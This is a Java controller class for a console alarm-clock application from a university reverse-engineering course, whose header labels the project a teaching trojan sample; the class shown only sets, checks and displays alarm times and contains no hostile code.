/*****************************************************************
 * Project:         Software Reverse Engineering (SRE) Education
 *                  Malware, Adware, and Spyware
 *                  Alarm Clock Trojan (Malware) Application
 * Programmer:      Teodoro Cipresso, San Jose State University
 *                  tcipress@hotmail.com
 ******************************************************************
 */
package info.reversingproject.alarmclock;

import java.util.Date;

/**
 * This class implements the controller in the MVC pattern; it listens for
 * actions on the view and coordinates relevant updates to the model.
 */
public class AlarmClockController extends Thread implements
		IAlarmClockViewListener {

	private static final int ALARM_CHECK_INTERVAL = 500;
	//
	private AlarmClockModel alarmClockModel = null;
	private AlarmClockView alarmClockView = null;

	/**
	 * Check whether to sound the alarm. We sleep the thread on which this
	 * instances runs for one half second before checking the alarm.
	 */

	public void run() {
		while (true) {
			try {
				Thread.yield();
				Thread.sleep(ALARM_CHECK_INTERVAL);
			} catch (InterruptedException _exception) {
				_exception.printStackTrace();
			} // try
			if (alarmClockModel.getAlarmTime() != null
					&& alarmClockModel.getClockTime().after(
							alarmClockModel.getAlarmTime())) {
				alarmClockModel.setAlarmTime(null);
				alarmClockView.doSoundAlarm();
			} // if
		} // while
	} // run

	/**
	 * Handle the user event to display the current set alarm time
	 */
	public void displayAlarmTimeSelected() {
		alarmClockView
				.displayAlarmTimeOnConsole(alarmClockModel.getAlarmTime() != null);
	} // displayAlarmTimeSelected

	/**
	 * Handle the user event to display the current clock time
	 */
	public void displayClockTimeSelected() {
		alarmClockView.displayClockTimeOnConsole();
	} // displayClockTimeSelected

	/**
	 * Handle the user event to set the current alarm time. The alarm may be set
	 * only if the specified date and time meet the following conditions: (1)
	 * the alarm date and time is later than the current date and time, and (2)
	 * the alarm date and time is not more than 15 minutes later than the
	 * current time
	 */
	public void setAlarmTimeSelected() {
		Date alarmTime = alarmClockView.getAlarmTimeInputFromConsole();
		if (alarmTime != null) {
			// check trial restrictions
			if (!alarmTime.after(alarmClockModel.getClockTime())) {
				// (1) Can't set alarm time earlier than the current time
				String message = "The entered alarm time ("
						+ AlarmClockModel.getDateFormat().format(alarmTime)
						+ ") is earlier than the current time. The alarm was not set.";
				alarmClockView.displayUserMessageOnConsole(true, message);
			} else {
				// passed restrictions check, update model
				alarmClockModel.setAlarmTime(alarmTime);
				alarmClockView.displayUserMessageOnConsole(false,
						"Alarm set is successful.");
			} // if
		} // if
	} // setAlarmTimeSelected

	/**
	 * Handle the user event to quit the application
	 */
	public void quitAlarmClockSelected() {
		String message = "Thank you for evaulating Alarm Clock 1.0!";
		alarmClockView.displayUserMessageOnConsole(false, message);
		System.exit(0);
	} // quitAlarmClockSelected

	/**
	 * @param alarmClockModel
	 *            , singleton instance of the model
	 */
	public void setAlarmClockModel(AlarmClockModel alarmClockModel) {
		this.alarmClockModel = alarmClockModel;
	} // setAlarmClockModel

	/**
	 * @param alarmClockView
	 *            , singleton instance of the view
	 */
	public void setAlarmClockView(AlarmClockView alarmClockView) {
		this.alarmClockView = alarmClockView;
	} // setAlarmClockView
} //

